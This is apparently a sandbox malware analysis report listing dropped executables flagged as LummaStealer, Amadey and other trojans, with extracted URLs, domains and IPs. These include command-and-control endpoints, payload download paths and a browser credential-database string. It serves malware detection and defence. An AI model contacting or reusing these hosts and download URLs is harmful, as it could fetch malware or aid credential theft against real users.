                          C:\Users\user\AppData\Local\Temp\main\extracted\in.exe100%AviraHEUR/AGEN.1352802
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\main\extracted\in.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe75%ReversingLabsWin32.Trojan.LummaStealer
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe88%ReversingLabsWin32.Trojan.Amadey
                          C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exe88%ReversingLabsWin32.Trojan.Amadey
                          C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe75%ReversingLabsWin32.Trojan.LummaStealer
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe50%ReversingLabsWin32.Infostealer.Tinba
                          C:\Users\user\AppData\Local\Temp\main\7z.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\main\7z.exe0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\main\extracted\in.exe67%ReversingLabsWin64.Trojan.Nekark
                          C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe67%ReversingLabsWin64.Trojan.Nekark
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://185.215.113.43/Zu7JuNko/index.php$v100%Avira URL Cloudmalware
                          pancakedipyps.click0%Avira URL Cloudsafe
                          https://grannyejh.lat/v0%Avira URL Cloudsafe
                          http://185.215.113.43/Zu7JuNko/index.phpcA100%Avira URL Cloudmalware
                          https://grannyejh.lat/apiY0%Avira URL Cloudsafe
                          https://grannyejh.lat/$10%Avira URL Cloudsafe
                          https://pancakedipyps.click/0%Avira URL Cloudsafe
                          https://pancakedipyps.click:443/api0%Avira URL Cloudsafe
                          http://185.215.113.43/Zu7JuNko/index.phpncoded1100%Avira URL Cloudmalware
                          http://31.41.244.11/files/fate/random.exe=#M0%Avira URL Cloudsafe
                          https://grannyejh.lat:443/api0%Avira URL Cloudsafe
                          https://grannyejh.lat/apin0%Avira URL Cloudsafe
                          https://pancakedipyps.click/piZ0%Avira URL Cloudsafe
                          http://185.215.113.43/Zu7JuNko/index.php4001100%Avira URL Cloudmalware
                          https://pancakedipyps.click/AE0%Avira URL Cloudsafe
                          https://pancakedipyps.click/apip0%Avira URL Cloudsafe
                          https://grannyejh.lat/apiIO0%Avira URL Cloudsafe
                          https://grannyejh.lat/%0%Avira URL Cloudsafe
                          https://pancakedipyps.click/jh0%Avira URL Cloudsafe
                          https://pancakedipyps.click/api0%Avira URL Cloudsafe
                          https://pancakedipyps.click/80%Avira URL Cloudsafe
                          https://grannyejh.lat/apiGw9kB20%Avira URL Cloudsafe
                          http://31.41.244.11/files/fate/random.exe84760(u0%Avira URL Cloudsafe
                          https://grannyejh.lat:443/apical0%Avira URL Cloudsafe
                          https://grannyejh.lat/0%Avira URL Cloudsafe
                          https://grannyejh.lat/apier20%Avira URL Cloudsafe
                          https://pancakedipyps.click/U0%Avira URL Cloudsafe
                          https://grannyejh.lat:443/apix/24a4ohrz.default-release/key4.dbPK0%Avira URL Cloudsafe
                          https://pancakedipyps.click/ob0%Avira URL Cloudsafe
                          http://31.41.244.11/files/dodo/random.exe100%Avira URL Cloudphishing
                          https://pancakedipyps.click:443/apicrosoft0%Avira URL Cloudsafe
                          https://grannyejh.lat/api0%Avira URL Cloudsafe
                          https://pancakedipyps.click/xe0%Avira URL Cloudsafe
                          https://pancakedipyps.click/api/0%Avira URL Cloudsafe
                          https://sweepyribs.lat:443/api0%Avira URL Cloudsafe
                          https://grannyejh.lat/apigs0%Avira URL Cloudsafe
                          https://grannyejh.lat/N0%Avira URL Cloudsafe
                          https://pancakedipyps.click/la0%Avira URL Cloudsafe
                          https://grannyejh.lat/apiFj0%Avira URL Cloudsafe
                          http://31.41.244.11/files/fate/random.exe/C100%Avira URL Cloudphishing
                          https://pancakedipyps.click/pi0%Avira URL Cloudsafe
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          pancakedipyps.click
                          104.21.23.76
                          truefalse
                            high
                            grannyejh.lat
                            172.67.179.109
                            truetrue
                              unknown
                              sweepyribs.lat
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                pancakedipyps.clicktrue
                                • Avira URL Cloud: safe
                                unknown
                                necklacebudi.latfalse
                                  high
                                  aspecteirs.latfalse
                                    high
                                    http://185.215.113.43/Zu7JuNko/index.phpfalse
                                      high
                                      sustainskelet.latfalse
                                        high
                                        crosshuaht.latfalse
                                          high
                                          rapeflowwj.latfalse
                                            high
                                            https://pancakedipyps.click/apitrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            energyaffai.latfalse
                                              high
                                              https://grannyejh.lat/apitrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              grannyejh.latfalse
                                                high
                                                discokeyus.latfalse
                                                  high
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabd2cb36d600.exe, 0000000B.00000003.2191195235.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191092860.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191279908.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2467698964.00000000039C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://duckduckgo.com/ac/?q=d2cb36d600.exe, 0000000B.00000003.2191195235.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191092860.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191279908.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2467698964.00000000039C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://185.215.113.43/Zu7JuNko/index.php$vskotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://ocsp.sectigo.com0skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://grannyejh.lat/v9f237e29d5.exe, 0000002F.00000003.2616619099.0000000001330000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2565575975.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://31.41.244.11/files/unique3/random.exeskotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://grannyejh.lat/apiY9f237e29d5.exe, 0000002F.00000003.2466238120.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2617545293.0000000001345000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://185.215.113.43/Zu7JuNko/index.phpCskotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://185.215.113.43/Zu7JuNko/index.phpcAskotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=d2cb36d600.exe, 0000000B.00000003.2191195235.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191092860.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191279908.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2467698964.00000000039C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://grannyejh.lat/$19f237e29d5.exe, 0000002F.00000003.2565676452.00000000012BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://31.41.244.11/files/fate/random.exeskotes.exe, 00000006.00000002.2681819982.00000000013FF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYid2cb36d600.exe, 0000000B.00000003.2241449211.0000000003AF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://pancakedipyps.click/d2cb36d600.exe, 0000000B.00000003.2190331950.0000000001357000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292886987.00000000013B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://185.215.113.43/Zu7JuNko/index.phpncoded1skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://pancakedipyps.click:443/apid2cb36d600.exe, 0000000B.00000003.2190380016.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2375048066.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2376937453.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2270396851.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292678383.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2354295558.0000000001333000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://31.41.244.11/files/fate/random.exe=#Mskotes.exe, 00000006.00000002.2681819982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://185.215.113.43/Zu7JuNko/index.phpxeskotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://grannyejh.lat:443/api9f237e29d5.exe, 0000002F.00000003.2466238120.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://grannyejh.lat/apin9f237e29d5.exe, 0000002F.00000003.2544502314.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2537049958.0000000003A16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://pancakedipyps.click/piZd2cb36d600.exe, 0000000B.00000003.2352961493.00000000013AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://pancakedipyps.click/AEd2cb36d600.exe, 0000000B.00000003.2352961493.00000000013AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://x1.c.lencr.org/0d2cb36d600.exe, 0000000B.00000003.2239540861.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2514277271.0000000003A47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://x1.i.lencr.org/0d2cb36d600.exe, 0000000B.00000003.2239540861.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2514277271.0000000003A47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchd2cb36d600.exe, 0000000B.00000003.2191195235.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191092860.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191279908.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2467698964.00000000039C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://185.215.113.43/Zu7JuNko/index.php4001skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://pancakedipyps.click/apipd2cb36d600.exe, 0000000B.00000003.2263478988.0000000003AF3000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2263716893.0000000003AF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://grannyejh.lat/apiIO9f237e29d5.exe, 0000002F.00000003.2565575975.0000000001345000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://grannyejh.lat/%9f237e29d5.exe, 0000002F.00000003.2616619099.0000000001330000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2570423163.0000000001330000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2545285658.000000000132F000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2565575975.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://pancakedipyps.click/jhd2cb36d600.exe, 0000000B.00000003.2270333586.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2270263915.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292588728.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2375485674.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2377229160.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2355246636.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2352961493.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2375415933.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2355380887.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292886987.00000000013B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://support.mozilla.org/products/firefoxgro.all9f237e29d5.exe, 0000002F.00000003.2515345361.0000000003CB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://pancakedipyps.click/8d2cb36d600.exe, 0000000B.00000003.2375581338.000000000136D000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2377133921.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://grannyejh.lat:443/apical9f237e29d5.exe, 0000002F.00000003.2565676452.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://sectigo.com/CPS0skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://grannyejh.lat/apiGw9kB29f237e29d5.exe, 0000002F.00000003.2513900579.0000000003A18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icod2cb36d600.exe, 0000000B.00000003.2191195235.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191092860.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191279908.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2467698964.00000000039C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://31.41.244.11/files/fate/random.exe84760(uskotes.exe, 00000006.00000002.2681819982.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://grannyejh.lat/9f237e29d5.exe, 0000002F.00000003.2565575975.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://grannyejh.lat:443/apix/24a4ohrz.default-release/key4.dbPK9f237e29d5.exe, 0000002F.00000003.2616200054.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://grannyejh.lat/apier29f237e29d5.exe, 0000002F.00000003.2565575975.0000000001345000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://xmrig.com/wizard%sIntel_PTT_EK_Recertification.exe, 00000024.00000003.2335547631.000001AB56C60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.2341537822.00000001402DD000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=d2cb36d600.exe, 0000000B.00000003.2191195235.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191092860.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191279908.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2467698964.00000000039C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://pancakedipyps.click/Ud2cb36d600.exe, 0000000B.00000003.2375581338.000000000136D000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2377133921.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0d2cb36d600.exe, 0000000B.00000003.2239540861.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2514277271.0000000003A47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://ocsp.rootca1.amazontrust.com0:d2cb36d600.exe, 0000000B.00000003.2239540861.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2514277271.0000000003A47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://xmrig.com/wizardIntel_PTT_EK_Recertification.exe, 00000024.00000003.2335547631.000001AB56C60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.2341537822.00000001402DD000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.d2cb36d600.exe, 0000000B.00000003.2241449211.0000000003AF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://pancakedipyps.click:443/apicrosoftd2cb36d600.exe, 0000000B.00000003.2375048066.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2376937453.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292678383.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2354295558.0000000001333000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://www.ecosia.org/newtab/d2cb36d600.exe, 0000000B.00000003.2191195235.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191092860.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191279908.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2467698964.00000000039C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://31.41.244.11/files/dodo/random.exeskotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: phishing
                                                                                                          unknown
                                                                                                          https://pancakedipyps.click/obd2cb36d600.exe, 0000000B.00000003.2270333586.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2270263915.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292588728.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2375485674.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2377229160.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2355246636.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2352961493.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2375415933.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2355380887.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292886987.00000000013B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br9f237e29d5.exe, 0000002F.00000003.2515345361.0000000003CB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44d2cb36d600.exe, 0000000B.00000003.2241449211.0000000003AF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://31.41.244.11/files/burpin1/random.exeskotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://ac.ecosia.org/autocomplete?q=d2cb36d600.exe, 0000000B.00000003.2191195235.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191092860.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2191279908.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002F.00000003.2467698964.00000000039C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://pancakedipyps.click/xed2cb36d600.exe, 0000000B.00000002.2377190667.00000000013AB000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2352961493.00000000013AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yskotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2681819982.0000000001419000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 00000008.00000002.2144680645.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 9f237e29d5.exe, 0000002D.00000002.2416628529.00000000014DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxexsvchost.exe, 00000029.00000002.2371900204.000000000283C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgd2cb36d600.exe, 0000000B.00000003.2241449211.0000000003AF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://pancakedipyps.click/api/d2cb36d600.exe, 0000000B.00000003.2375581338.000000000136D000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2190430554.000000000136C000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2377133921.000000000136D000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2190331950.0000000001357000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://185.215.113.43/Zu7JuNko/index.php~skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
